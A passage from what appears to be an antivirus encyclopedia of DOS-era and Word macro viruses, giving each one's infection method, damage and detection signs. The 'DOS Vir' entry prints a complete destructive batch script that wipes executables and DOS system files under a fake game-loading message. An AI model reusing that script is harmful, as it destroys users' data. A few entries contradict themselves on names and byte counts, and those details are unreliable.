the system areas will not be modified, but the virus will cause the
system to crash.
Damage: Virus infects .COM files shorter than 61440 bytes and .EXE
files. As a flag virus, it increases the year in the file's time stamp
by 100 years. (DOS reports only the last two digits, so it cannot be
easily recognized when, for example, the "DIR" command is executed).
Detection Method: The virus increases infected file size by 4096
bytes. The operating memory is decreased by about 6 KB.
[534]
Virus Name: 534
Virus Type: Parasitic Virus
Virus Length: 534 bytes
Symptoms: Virus infects .COM files in the current directory or root
directory that are longer than 256 bytes and shorter than 64000 bytes.
Increases infected file size by 534 bytes and the file contains the
string "????????.COM".
[April 1st]
Virus Name: April 1st
Other Names: None
Virus Type: File Virus
Virus Length: 1488 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in the
memory. If it is not, it loads itself by hooking INT 21h.
2) Next, it executes the original file.
3) Once it is resident in the memory it will infect any uninfected
file that is executed.
Damage: On April 1, the virus displays the message "APRIL 1ST HA HA HA
YOU HAVE A VIRUS." After displaying the message, the virus halts the
system.
Detection Method: April 1st increases the size of .EXE files by 1488
bytes. Infected file contains the string "SURIV." Check to see if the
file named "BUG.DAT" exists hidden in the C:\ directory.
Notes: Loads itself resident in the memory. An error message appears
if an I/O error (such as write protect) occurs.
[Autumn]
Virus Name: Autumn
Other Names: Virus 1701, Cascade-B
Virus Type: Parasitic Virus, RAM resident
Virus Length: 1701 bytes
PC Vectors Hooked: Int 21
Execution Procedure:
1) The virus checks whether it is already loaded resident in the
memory. If it isn't, it loads itself by hooking INT 21h.
2) Next, it executes the original file.
3) Once it is resident in the memory it will infect any uninfected
file that is executed.
Damage: The Autumn virus causes characters to "fall down" the screen
(Video-RAM modification). This does not happen frequently at the
beginning but, as time goes by, the frequency of both the "fall down"
and sound effects will increase. Semigraphic characters do not fall.
Characters cannot fall over different video attributes. It doesn't
work on monochrome monitors. The virus sometimes causes the computer
to crash.
Detection Method: Infected files increase in size by 1701 bytes.
Notes: Loads itself resident in the memory. An error message appears
if an I/O error (such as write protect) occurs.
[Bogus-B]
Virus Name: BOGUS-B
Virus Type: File Virus (.COM and .EXE files) and
Partition Table Infector
Virus Length: No change
PC Vectors Hooked: INT 21h, INT 24h, INT 13h
Infection Process:
1) When you execute a file infected with the Bogus-B virus, it will
check to see whether Sector #1 has been infected. If not, the virus
will proceed to infect sector #1.
2) Next, it checks whether it is loaded resident in the memory. If it
isn't, it loads itself by hooking INT 21h and INT 13h, and then
executes the original file.
3) Once resident in the memory, the BOGUS-B virus can infect any
executable programs.
Damage: When the number of infected files exceeds 2710h, BOGUS-B
destroys all data on the hard disk.
Detection Method: Check to see if the file head is INT 13h (AX=90 or
91). If it is, check whether INT 21h is hooked. a) When starting the
system, make 21_flag=3. b) Check whether INT 21h is called by other
programs; if "yes", 21_flag is decreased by 1. c) When 21_flag=0,
BOGUS hooks INT 21h to infect other files. 2) Check for any attempts
to read sector #1; if there is, then display the original data of
sector #1. 3) Check whether AX=90 or 91; if "yes", then execute the
real interrupt.
Notes: BOGUS hooks INT 24h when infecting files. It omits I/O errors
(such as write protect).
[Bulgarian Virus]
Virus Name: Bulgarian Virus
Other Names: Virus 1800, Sofia virus, Dark Avenger
Virus Type: Parasitic Virus and Boot Strap Sector Virus
Virus Length: Approx. 1800 bytes
PC Vectors Hooked: Int 21
Infection Process:
1) The virus checks whether it is already loaded resident in the
memory. If it's not, it loads itself by hooking INT 21h.
2) The virus then executes the original file.
3) Once it is resident in the memory the virus will infect any
uninfected file that is executed.
Damage: The virus reads the disk's boot sector, and (offset 10, OEM
decimal version) marks the number of programs which were executed
from the disk MOD 16. If it is zero (after every 16 programs!!),
it overwrites a random cluster on the disk with part of its own
code. The cluster number is then stored in the boot sector at offset
8 (OEM main version). The modified boot sector is then written back
onto the disk.
Detection Method: Infected files increase by 1800 bytes.
Notes:
1) Loads itself resident in the memory.
2) Doesn't hook INT 24h when infecting files. An error message appears
if an I/O error (such as write protect) occurs.
[Cannabis-B]
Virus Name: Cannabis-B
Virus Type: File Infector
Virus Length: None
PC Vectors Hooked: None
Execution Procedure: When a file infected with this virus is executed,
a boot virus "Cannabis" is written onto the boot sector of the A
drive.
Damage: see Execution Procedure above.
Detection Method: None
Notes: Cannabis doesn't hook INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Christmas]
Virus Name: Christmas
Other Namess: Virus 600, Xmas In Japan, Japanese Christmas
Virus Type: File Virus (.COM files)
Virus Length: 600 bytes
Damage: When a file infected with this virus is executed on December
25, the following message will be displayed:
"A Merry christmas to you" or "Jingo Bell, jingo bell, jingo all
the way."
Detection Method: The COMMAND.COM file increases in size by 600
bytes and infected .COM files increase in size by 600 bytes.
[Comp-3351]
Virus Name: Comp-3351
Virus Type: Parasitic Virus
Virus Length: 3351 bytes
Execution Process:
Comp-3351 searches for an .EXE file in the current directory. It then
creates a .COM file (hidden file) using the same file name as the .EXE
file. The .COM file contains the virus code with length equivalent
to 3351 bytes.
Damage: None
Detection Method: Length of the file is 3351 bytes.
Remarks:
1) Non-memory resident.
2) The virus file is compressed and cannot be recognized before
decompression (similar to PKLITE).
[Como-B]
Virus Name: Como-B
Virus Type: File Virus (.EXE files)
Virus Length: 2020 bytes
PC Vectors Hooked: None
Execution Procedure:
1) Searches for an .EXE file in the current directory and, once it
locates one, it checks whether it has been infected by COMO-B.
If the file is already infected, the virus continues to look for
any uninfected .EXE file.
2) COMO-B infects files one at a time.
3) After infecting three files, the following message appears:
"This is the ...COMO-LAKE .. virus(rel . 1 1).........I'm a
non-destructive virus developed to study the worldwide diffusion
rate. I was released in September 1990 by a software group
resident near Como lake (north Italy) .....Don't worry about your
data on disk. My activity is limited only .. to auto-transferring
into other program files. Perhaps you've got .. many files
infected. Press a key to execute the prompt.
Damage: None
Detection Method: Infected files increase by 2020 bytes.
Notes:
1) Doesn't stay resident in the memory.
2) COMO doesn't hook INT 24h when infecting files. An error message
appears if an I/O error (such as write protect) occurs.
[D-Tiny]
Virus Name: D-TINY
Virus Type: Memory Resident, File Infector (.COM files)
Virus Length: 126 bytes
PC Vectors Hooked: INT 21h
Infection Procedure:
1) If it isn't loaded resident in the memory, D-Tiny loads itself by
hooking INT 21h.
2) Next, it executes the original file.
3) Once it is resident in the memory it will infect any uninfected
file that is executed. It doesn't infect .EXE files.
Damage: None
Detection Method: Infected .COM files increase by 126 bytes.
Notes: D-TINY doesn't hook INT 24h when infecting files. An error
message appears if an I/O error (such as write protect) occurs.
[Dark_Avenger]
Virus Name: Dark_Avenger
Alias: Eddie
Virus Type: File Infector (.COM and .EXE files)
Virus Length: 1,800 bytes
PC Vectors Hooked: INT 21h
Infection method: When an infected file is executed, the virus loads
itself in the memory. While loaded, it infects accessed, executable
files. Infected files increase by 1800 bytes.
Damage: The virus reads the disk's boot sector and marks the number
of programs executed from the disk. After every 16 programs, it
overwrites a random cluster on the disk with part of its own code.
The infected files contain these strings:
"Eddie lives...somewhere in time! Diana P."
"This program was written in the city of Sofia (C) 1988-89 Dark
Avenger."
[Data Crime IIB]
Virus Name: Datacrime II b
Other names: None
Virus Type: File Virus
Virus Length: 1460 bytes
Damage: The virus will low-level format cylinder 0 of your hard disk
after October 12.
Detection Method: Between October 12-31, excluding Mondays, the virus
will display the following message: "DATACRIME-2 VIRUS." The virus will
then low-level format cylinder 0 of the hard disk. The system will then
halt.
[Deiced]
Virus Name: Deiced
Virus Type: File Infector, Highest Memory Resident ( .COM files only)
Virus Length: 2333 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether or not the virus has been loaded resident in the high
memory. If not, it loads itself onto the highest memory by hooking
INT 21h.
2) It checks whether the file COMMAND.COM has been infected.
If not, the virus infects it.
3) Deiced checks the system date and, if it is the 15th of January,
April or August, the virus will damage all files on the system disk.
Infection Procedure: The virus infects a .COM file by hooking the
AX=4B00h call (if the file is not infected). When the command "DIR"
is executed, the virus will look for all uninfected files in the
directory and proceed to infect them. Deiced hooks INT 24h to hide
itself while infecting.
Damage: If the system date is the 15th of January, April or August,
the virus will damage all files on the system disk.
Detection Method: Infected files increase by 2333 bytes.
[Dropper-4]
Virus Name: DROPPER-4
Virus Type: File Infector (.COM and .EXE files)
Virus Length: 1125 bytes
PC Vectors Hooked: INT 24h
Execution Procedure:
1) The virus searches for an uninfected .COM or .EXE file in the
current directory.
2) Infects files in the current directory two at a time.
3) Executes the original file.
Damage: None
Detection Method: Infected files increase by 1125 bytes.
Notes:
1) Doesn't stay resident in the memory.
2) Dropper-4 hooks INT 24h when infecting files. It omits I/O
errors (such as write protect).
[Ell]
Virus Name: ELL
Other names: None
Virus Type: File Infector (.COM and .EXE files)
Virus Length: 1237-1246 bytes (EXE files)
1237 bytes (COM files)
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether or not it is memory resident. If not, it loads
itself resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) Once resident in the memory it will infect any uninfected file
that is executed.
Damage: None
Detection Method: Increases infected file size by 1237/1246 bytes.
Notes:
Loads itself resident in the memory. An error message appears if
there is an I/O error (such as write protect).
[Elvis]
Virus Name: Elvis
Virus Type: File Infector (.COM files)
Virus Length: 1250 bytes
PC Vectors Hooked: INT 8h
Execution Procedure:
1) The virus searches for uninfected COM files in the current
directory, and infects them three at a time.
2) Hooks INT 8h and executes the original file.
Damage: About eight (8) minutes after the virus is executed, one of
these messages appears on the screen: 1) "Elvis lives!" 2) "ELVIS is
watching!" 3) "Don maybe he lives here!.....," and so on.
Detection Method: Infected files increase by 1250 bytes.
Notes:
1) Doesn't stay resident in the memory.
2) Elvis doesn't hook INT 24h when infecting files. It omits I/O errors
(such as write protect).
[F3]
Virus Name: F3
Virus Type: Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 50406 bytes
PC Vectors Hooked: INT 21h, AX=4B00h (execute program), INT 24h
Infection Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the highest memory by hooking INT 21h.
2) Checks the system date. If the date is April 1, two lines of code
will appear on the screen.
3) Executes the original file.
4) Once memory resident it will infect any uninfected file that is
executed.
Damage: None
Detection Method: Infected files increase by 50406 bytes.
Notes: The F3 virus hooks INT 24h when infecting files. It omits I/O
errors (such as write protect).
[Flip-B]
Virus Name: Flip-B
Virus Type: File and Partition Table Infector Virus
Virus Length: 2153 bytes
PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch
Execution Procedure:
1) When you execute a file infected with Flip-B, the virus checks
whether Sector #1 on the hard drive is infected. If not, the virus
infects it.
2) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h and INT 1Ch.
3) It infects files as they are executed.
Damage: You may not be able to boot up the machine from the hard disk.
Detection Method: Infected files increase by 2153 bytes.
INT 1Ch: Detects whether INT 21h is constantly hooked by another
program.
Notes: Flip-B hooks INT 24h when infecting files, omitting I/O errors
such as write protect.
[Gp 1]
Virus Name: Gp1
Virus Type: Network Specific Virus
Virus Length: 1557 bytes (EXE files)
1845 bytes (COM files)
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the highest memory by hooking INT 21h.
2) Executes the original file.
3) Once memory resident it will infect any uninfected file that
is executed.
Symptoms: If the virus is active in the memory and if the first
character on the command line is not an "i", the virus removes itself
from the operating memory (this will work only if the virus is the last
TSR to change interrupt vector 21h) and displays the message "GP1
Removed from memory."
Damage: None. Gp1 is the only known LAN virus. This unique virus is a
modification of the Jerusalem virus and was created for one special
purpose: to penetrate Novell security features and spread inside the
network. The virus does not contain any manipulation (if we do not
count the monitoring of Novell LOGIN and the attempts to break the
Novell security features).
[Hiccup]
Virus Name: Hiccup
Aliases: Comp-3351
Virus Type: Parasitic Virus (infects .EXE files)
Virus Length: 3351 bytes
Execution Procedure:
1) Hiccup searches for an .EXE file in the current directory.
2) Creates a *.COM file (hidden file) consisting of the virus itself.
When executed, the *.COM file executes, then returns to the
original routine.
Damage: None
Detection Method: File length is 3351 bytes.
Notes:
1) Non-memory resident.
2) The virus file is compressed and cannot be recognized without
decompression (similar to PKLITE).
[Icelandic]
Virus Name: Icelandic
Other names: Saratoga
Virus Type: File Virus
Virus Length: 642 bytes (EXE)
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) Once memory resident it will infect any uninfected file that is
executed. Doesn't infect .COM files.
Damage: Infected .EXE files increase by 642 bytes.
Note:
1) The virus loads itself resident in the memory.
2) Doesn't hook INT 24h when infecting files.
3) An error message appears if an I/O error (such as write protect)
occurs.
[Inok-2371]
Virus Name: Inok-2371
Virus Type: Parasitic Virus
Virus Length: Infected .COM files increase by 2372 bytes
(does not infect EXE files)
PC Vectors Hooked: None
Execution Procedure: Randomly does one of the following:
1) Searches for an uninfected .COM file in the current directory.
Infects the file if there is one (infects only one file at a
time), and/or executes the host program.
2) Creates a file named ICONKIN.COM in the current directory and then
runs it. (It will not infect any files. It will display a small
window repeatedly until a key is pressed. And, the small window
will show up after a period of time. While the small window is on
the screen, everything will be forced to wait.)
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When an uninfected
file is executed, the virus infects it.
2) Lycee hooks INT 24h before infecting files to ignore I/O errors.
Damage: Refer to Execution Procedure 2).
Detection Method:
1) Check for the small window described in Execution Procedure 2).
2) Infected files increase by 2372 bytes.
Remarks:
1) Non-memory resident.
2) When infecting files, the virus does not hook INT 24h. An error
message will appear when I/O errors occur.
[J-Infect]
Virus Name: J-Infect
Virus Type: Memory Resident, File Virus (.COM and .EXE files)
Virus Length: 12080 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) This is similar to the "JERUSALEM" virus in that it infects the same
types of files.
Detection Method: Infected files increase by 10280 bytes.
[Joanna]
Virus Name: JOANNA
Aliases: None
Virus Type: File Infector
Virus Length: 986 bytes
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) Once memory resident it will infect any uninfected file that is
executed.
Detection Method:
1) Virus displays the message "I love you Joanna, Apache...."
2) Infected files increase by 986 bytes.
Note: Loads itself resident in the memory. An error message appears
if an I/O error (such as write protect) occurs.
[July 4]
Virus Name: July 4, Stupid 1
Virus Type: File Infector (.COM files)
Virus Length: 743 bytes
Execution Procedure:
1) If the word at address 0000:01FEh is FFFFh, the virus will not
infect any file. Otherwise, it infects all uninfected .COM files
on the current directory. If the number of infections is less than
2, it will proceed to infect .COM files on the upper directory
until more than two files are infected or until it has reached the
root directory.
2) If the current date is July 4 and current time is either 0:00am,
1:00am, 2:00am, 3:00am, 4:00am, or 5:00am, the virus will destroy
data on the current diskette.
Detection Method:
1) The date and time fields of infected files are changed.
2) The byte at 0003h of an infected .COM file is 1Ah.
3) Infected .COM files display one of the following messages:
"Abort, Retry, Ignore, Fail?" , "Fail on INT 24"
(2) - "Impotence error reading users disk"
(0) - "Program too big to fit in memory"
(1) - "Cannot load .COMMAND, system halted"
(3) - "Joker!" and "*.com."
[K]
Virus Name: N1
Virus Type: COM File infector
Virus Length: 10230-10240 bytes
Execution Procedure:
1) Searches for an uninfected COM file in the current directory, then
infects it (only infects one file at a time).
2) It then displays the following message:
"This File Has Been Infected By NUMBER One!"
Damage: None
Note:
1) It does not stay resident in the memory.
2) An error message will appear when writing because INT 24h has not
been hanged.
Detection Method:
1) Infected files will display the above message when executed.
[Kill COM]
Virus Name: Killcom
Virus Type: File Virus
Virus Length: 31648 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) Looks for COMMAND.COM in the current directory of C:\.
2) If found, corrupts this file. If not, creates a COMMAND.COM file
with 213 Bytes.
Damage: Corrupts the COMMAND.COM file in the current directory of
C:\.
Detection Method: None
Note:
1) Doesn't stay resident in the memory.
2) Doesn't hook INT 24h when infecting files. An error message
appears if there is an I/O error (such as write protect).
[LB-Demonic]
Virus Name: lb-Demonic
Virus Type: File Virus (infects .COM files)
Virus Length: No change
PC Vectors Hooked: None
Execution Procedure:
1) Infects all uninfected .COM files in the current directory.
2) When the file is executed this message appears: "EXEC FAILURE"
3) Checks the system date. If it is Tuesday, the virus renames
COMMAND.COM in C:\ to COMMAND.C0M ("O" in .COM changed to "0").
4) Displays this message: "Error reading drive C:\ ... BillMeTuesday"
Damage:
1) Renames COMMAND.COM to COMMAND.C0M, so the system can't start
from the disk.
2) Overwrites original files, so infected files won't increase in
length.
Note:
1) Doesn't stay resident in the memory.
2) Doesn't hook INT 24h when infecting files. Error message appears
if there is an I/O error (such as write protect).
[Mixer 1A]
Virus Name: Mixer 1A
Other names: Virus 1618
Virus Type: File Virus
Virus Length: Approximately 1618 bytes
PC Vectors Hooked: Int 21
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) Once memory resident, it will infect any uninfected file that is
executed.
Damage: The mixture of characters sent to the serial or parallel port
using BIOS functions is the main damage routine of this virus. All
bytes sent to the port are translated using the virus' own table.
Fifty (50) minutes after the virus is installed into memory, the
keyboard routine is activated. From this time on, CapsLock will be
set to OFF, and Numlock will be set to ON. The virus will check
whether the "Ctrl", "Alt", and "Del" keys are simultaneously
depressed. If this is the case, the virus will suppress the "Alt"
command and activate a routine for screen manipulation. However, the
virus will call the routine in the wrong manner.
In text mode, the virus changes all attributes of video page 0. It will
add 1 to all attributes and after 256 the virus will reset itself. Sixty
(60) minutes after the virus is installed in the memory, it will display
a bouncing ball similar to the one seen in the Ping-Pong virus. The ball
is marked "o" and its movement is controlled by the BIOS (interrupt 10h).
Note:
1) An error message appears if there is an I/O error (such as
write protect).
[Multi-2B]
Virus Name: Multi-2-B
Virus Type: File Virus (infects .COM and .EXE files) and
Partition Table Infector
Virus Length: 927 Bytes (COM files), about 1000 Bytes (EXE files)
PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h
Execution Procedure:
1) When you execute an infected file, the virus infects Sector #1 (if
not yet infected) of the hard disk.
2) Checks whether it is memory resident. If not, it infects Sector #1
and then exits. If it is, executes the original program.
Damage: None
Detection Method: Infected files increase by 927-1000 Bytes.
Note:
1) Multi-2 hooks INT 24h when infecting files.
2) Omits I/O errors (such as write protect).
[Necro-B]
Virus Name: Necro-B
Virus Type: File Virus (infects .EXE and .COM files)
Virus Length: 696 Bytes (COM and EXE)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for uninfected .COM and .EXE files in the current
directory, and infects them three files at a time.
Damage: None
Detection Method:
1) Infected files increase by 696 Bytes.
Note:
1) Doesn't stay resident in the memory.
2) Doesn't hook INT 24h when infecting files. Error message
appears if there is an I/O error (such as write protect).
3) Infected files can't execute or infect other files.
[No Wednesday]
Virus Name: NO-WEDNESDAY
Virus Type: File Virus (infects .COM files)
Virus Length: 520 Bytes (COM)
PC Vectors Hooked: INT 24h
Execution Procedure:
1) Searches for uninfected COM files in the current directory and
infects them one at a time.
2) Displays the message: "file not found."
Damage: Infected files can not execute original file.
Detection Method:
1) Infected files increase by 520 Bytes.
2) "file not found" message appears on the screen.
Note:
1) Doesn't stay resident in the memory.
2) Hooks INT 24h when infecting files. Omits I/O error (such as
write protect).
[Prudent]
Virus Name: Prudent
Other names: 1210
Virus Type: File Virus
Virus Length: 1210 bytes (EXE files)
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) Once memory resident it will infect any uninfected file that is
executed. Doesn't infect .COM files.
Damage: Overwrites original files.
Detection Method: From May 1-4, the virus will frequently check the
disk, thus causing abnormal disk activity.
Note:
1) Loads itself resident in the memory.
2) An error message appears if there is an I/O error (such as write
protect).
[Sandwich]
Virus Name: SANDWICH
Virus Type: Highest Memory Resident, File Virus (infects .COM files)
Virus Length: 1172 Bytes (COM)
PC Vectors Hooked: INT 21h, AX=4B00h (execute program)
Infection Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) While memory resident it infects any uninfected file that is
executed. Doesn't infect .EXE files.
Damage: None
Detection Method: Infected files increase by 1172 Bytes.
Note: The Sandwich virus doesn't hook INT 24h when infecting files.
An error message appears if there is an I/O error (such as write
protect).
[Scythe-2d]
Virus Name: Scythe-2d
Virus Type: Boot Virus
PC Vectors Hooked: INT 13h
Execution Procedure:
1) Modifies the memory size, decreasing the real memory size by 1K.
2) Installs itself resident in the memory (in the last 1K of the
memory).
3) Hooks INT 13h.
4) Returns the control to DOS and the system boots normally.
Damage: None
Note:
1) When booting the system with a floppy disk, the virus will first
check whether the hard disk is infected. If not, the virus will
infect it.
2) INT 13h: checks for any request for the contents of the boot sector
or partition table. If such request exists, the virus will return
the uninfected, original data.
[Sunday]
Virus Name: Sunday
Other Names: None
Virus Type: Boot Strap Sector Virus (Memory Resident)
Virus Length: 1636 bytes
Damage: The infected system becomes unusable every Sunday.
Detection Method: Every Sunday, the virus displays the following
message: "Today is Sunday! Why do you work so hard? All work and no
play makes you a dull boy! Come on! Let's go out and have some fun!"
[The Silence of the Lamb!]
Virus Name: The Silence Of The Lamb!
Virus Type: Memory Resident, File Virus (COM files)
Virus Length: 555 bytes
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it is still in the last memory block. If not, it
stays resident in the high memory and returns to the original
routine.
Infection Procedure:
1) Encodes the first 200h bytes of the original file.
2) Attaches them and the decoded codes at the end of the file.
3) Encodes the virus code and writes them onto the first 200h bytes
of the file.
Damage: None
Notes:
1) Hooks INT 21H (AH=4Bh) to infect files.
2) Hangs INT 24h to prevent divulging its trace when writing, then
checks whether the program to be executed is an uninfected COM
file (length must be between 0400h and FA00h bytes). If it is,
the virus infects it. Lastly, the virus restores INT 24h.
3) Date and time fields of infected files are not changed.
Detection Method:
1) Call INT21h (AH=2Dh,CH=FFh,DH=FFh) to return the value of AH. If
AH=00h, the memory is infected. If AH=FFh, the memory is not
infected.
2) If the word at address 0002 of the COM file is 5944h, the memory
is infected. After the virus code has been decoded, there will
be a text in 01E6h-01EFh that reads:
" The Silence Of The Lamb!$"
3) Total memory decreases by 1568 bytes.
[USSR]
Virus Name: USSR
Other Names: 570, 8-17-88, 2:08a
Virus Type: Parasitic Virus
Virus Length: 570 bytes
Symptom:
1) Infects .EXE files. Increases file size by 570 to 585 (570+15) bytes.
(The next multiple of 16 of the original file size plus 570).
2) The date and time fields in the file's directory entry is set to
8-17-88 and 2:08a.
Damage: Writes one sector to the boot sector of the C drive, then halts
the system.
[Vacsina-V16h]
Virus Name: Vacsina V16h
Other Names: Virus 1339
Virus Type: Parasitic Virus, RAM resident
Virus Length: Approximately 1339 bytes
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) While memory resident, the virus infects any uninfected file that
is executed.
Damage: The virus modifies the Ping-Pong virus in the memory. The virus
changes two bytes, jumps, and adds one subroutine. It is interesting
that the Ping-Pong virus is ready to change in this manner. After 255
reboots, the infected disk is deactivated in the memory, returning the
original interrupt vector to 13h with the value of 0:413h. The virus
proceeds to play the "Yankee Doodle" song.
Note: Loads itself resident in the memory. An error message appears if
there is an I/O error (such as write protect).
[VCL-2-B]
Virus Name: Vcl-2-B
Virus Type: File Virus (infects .COM files)
Virus Length: 663 Bytes(COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) Once it locates a file it checks whether it has been infected by
VCL-2. If it has, it continues to look for any uninfected .COM file.
3) It only infects two files at a time.
Damage: None
Detection Method:
1) Infected files increase by 663 Bytes.
Note:
1) Doesn't stay resident in the memory.
2) Doesn't hook INT 24h when infecting files. Error message appears if
there is an I/O error (such as write protect).
[Violator]
Virus Name: Violator
Other Names: Violator Strain B, Violator BT
Virus Type: File Virus
Virus Length: 1055 bytes (COM files)
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) While memory resident the virus infects any uninfected file that
is executed. Doesn't infect .EXE files.
Damage: If the system date is after Aug 15, 1990, the virus will format
the first cylinder of the current drive.
Detection Method:
1) Infected .COM files increase by 1055 bytes.
Note:
1) Loads itself resident in the memory.
2) An error message appears if there is an I/O error (such as write
protect).
[Virus 9]
Virus Name: Virus9
Virus Type: File Virus (infects .COM files)
Virus Length: 256 Bytes (COM files)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It infects all uninfected files until all files in the current and
the "mother" directories are infected.
Damage: None
Detection Method: Infected files increase by 256 Bytes.
Note:
1) Doesn't stay resident in the memory.
2) Doesn't hook INT 24h when infecting files. Error message appears
if there is an I/O error (such as write protect).
3) The virus does not reinfect.
[Winword.Nuclear]
Virus Name: Winword.Nuclear
Virus Type: File Virus
Virus Length: N/A
Description: This virus infects MSWORD documents.
When an infected document is opened, the virus goes resident by
adding some macros to your WORD environment. The virus also runs a
macro called PayLoad which wipes out your DOS system files on the 5th
of April.
Once the virus is active, all documents saved using the "Save As..."
command will be infected. Occasionally, printed documents will have
the following two lines of text added:
"And finally I would like to say:
STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC"
The virus may also try to inject a DOS file virus "Ph33r" into your
system.
[Wit Code]
Virus Name: WITCODE
Other names: None
Virus Type: File Virus
Virus Length: 965/975 bytes
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h.
2) It then executes the original file.
3) Once memory resident it infects any uninfected file that is
executed.
Damage: None
Detection Method: Increases infected file size by 965/975 bytes
Note:
1) Loads itself resident in the memory.
2) An error message appears if there is an I/O error (such as write
protect).
[XQR-B]
Virus Name: XQR-B
Virus Type: File Virus (infects .COM and .EXE files) and
Partition Table Infector
Virus Length: No change
PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h
Execution Procedure:
1) When you execute an infected file, the virus infects Sector #1.
2) Checks whether it is memory resident. If not, it loads itself
resident in the memory by hooking INT 21h, INT 8h, and INT 13h.
3) If the system date is May 4, the virus displays this message:
" XQR: Wherever, I love you Forever and ever! The beautiful memory
for ours in that summer time has been recorded in Computer history .
Bon voyage, My dear XQR! "
4) Infects every uninfected file that is executed.
Damage: The virus changes the keyboard configuration every Sunday.
Detection Method: Check whether or not the keyboard is working
properly.
Note:
1) Hooks INT 24h when infecting files. It omits I/O errors (such as
write protect).
[Yonyu]
Virus Name: YONYU
Virus Type: Boot Sector and Partition Infector
Virus Length: None.
PC Vectors Hooked: INT 13h
Execution Procedure:
1) The virus decreases, by 1K bytes, the total memory when the system
is booted from an infected disk.
2) It loads itself resident into the last 1K bytes of the memory.
3) Hooks INT 13h.
4) Infects the diskette.
Damage: None
Detection Method: Decreases total memory by 1K Bytes.
Note:
1) Doesn't hook INT 24h when infecting files. It omits I/O errors
(such as write protect).
[Gorlovka]
Virus Name: Gorlovka
Virus Type: Memory resident, File Virus (COM and EXE files)
Virus Length:
PC Vectors Hooked: INT 21h, INT 24h
Execution Procedure:
1) Checks whether it resides in the memory. If it is, the virus
displays the following message: "Tracing mode has been destroyed."
Otherwise, it loads itself resident in the high memory.
2) Hooks INT 21h and then displays: "Tracing mode has been destroyed."
Infection Procedure: Hooks INT 21H(AH=4Bh). First, it will hang INT
24h to prevent divulging its trace when writing, then checks
whether the program to be executed is an uninfected COM or EXE
file. If it is, the virus proceeds to infect it. Lastly, the virus
restores INT 24h.
Damage: The virus overwrites the original files with the virus code,
thus corrupting them.
Note: Infected file sizes are not changed.
Detection Method: Check for the above message.
[Akuku-649]
Virus Name: Akuku-649
Virus Type: File Virus (COM files)
Virus Length: 649 bytes
Execution Procedure:
1) Searches for all uninfected COM files on the current directory
(it does not infect the same file twice) and then proceeds to
infect them.
2) No matter whether it has infected files or not, it will check
whether the current calendar year is greater than 1994, the
current month is greater than 6, the current day is greater
than 6, and the current time is after 15:00. If all these
conditions are met, the virus displays the following message:
"A kuku frajerze."
Damage: None
Note:
1) Does not stay in the memory.
2) Before infecting files, it will hang INT 24h to prevent
divulging its trace when writing.
Detection Method: Infected files increase by 649 bytes.
[Cossiga]
Virus Name: Cossiga
Virus Type: File Virus (EXE files)
Virus Length:
Execution Procedure:
1) Searches for an uninfected EXE file on the current directory, and
then infects it (only infects one file at a time).
2) No matter whether it has infected files or not, it will check
whether the current date is after 10/17/1991. If it is, the virus
displays the following message:
"COSSIGA ?! NO GRAZZIE ! By Amissi dee Panoce (c) 1991 "
Damage: It overwrites the original files with the virus code, thus
corrupting the files.
Note:
1) Does not stay in the memory.
2) An error message appears when writing because INT 24h has
not been hanged.
[DOS Vir]
Virus Name: Dosvir
Virus Type: TROJAN
Virus Length: 3004 bytes
Execution Procedure:
1) The virus creates a batch file with the following commands:
CLS
echo Cracked by Cracking Kr .e 20 2
echo Loading game. .Please Wait....
c:
CD\
DEL autoexec.bat
DEL *.exe
DEL *.com
DEL *.exe
DEL *.com
DEL *.sys
ATTRIB..-r ibmbio.com
ATTRIB..-r ibmdos.com
ATTRIB..-r ibmbio.sys
ATTRIB..-r ibmdos.sys
DEL ibmbio.com
DEL ibmdos.com
DEL ibmbio.sys
DEL ibmdos.sys
CD\bbs
DEL *.exe
DEL *.com
CD\dos
DEL *.exe
DEL *.com
d:
CD\
DEL autoexec.bat
DEL *.exe
DEL *.com
CD\dos
DEL *.exe
DEL *.com
CD\bbs
DEL *.exe
DEL *.com
CLS
2) Executes the batch file.
[Deranged]
Virus Name: Deranged
Virus Type: File Virus (EXE files)
Virus Length: 419 bytes
Execution Procedure:
1) Searches for all uninfected EXE files on the current directory, and
then proceeds to infect them.
Damage: None
Note:
1) Because the virus procedure is not well written, the system halts
when an infected file is executed.
2) Does not stay in the memory.
3) An error message appears when writing because INT 24h has
not been hanged.
Detection method: Infected files increase by 419 bytes.
[James]
Virus Name: James
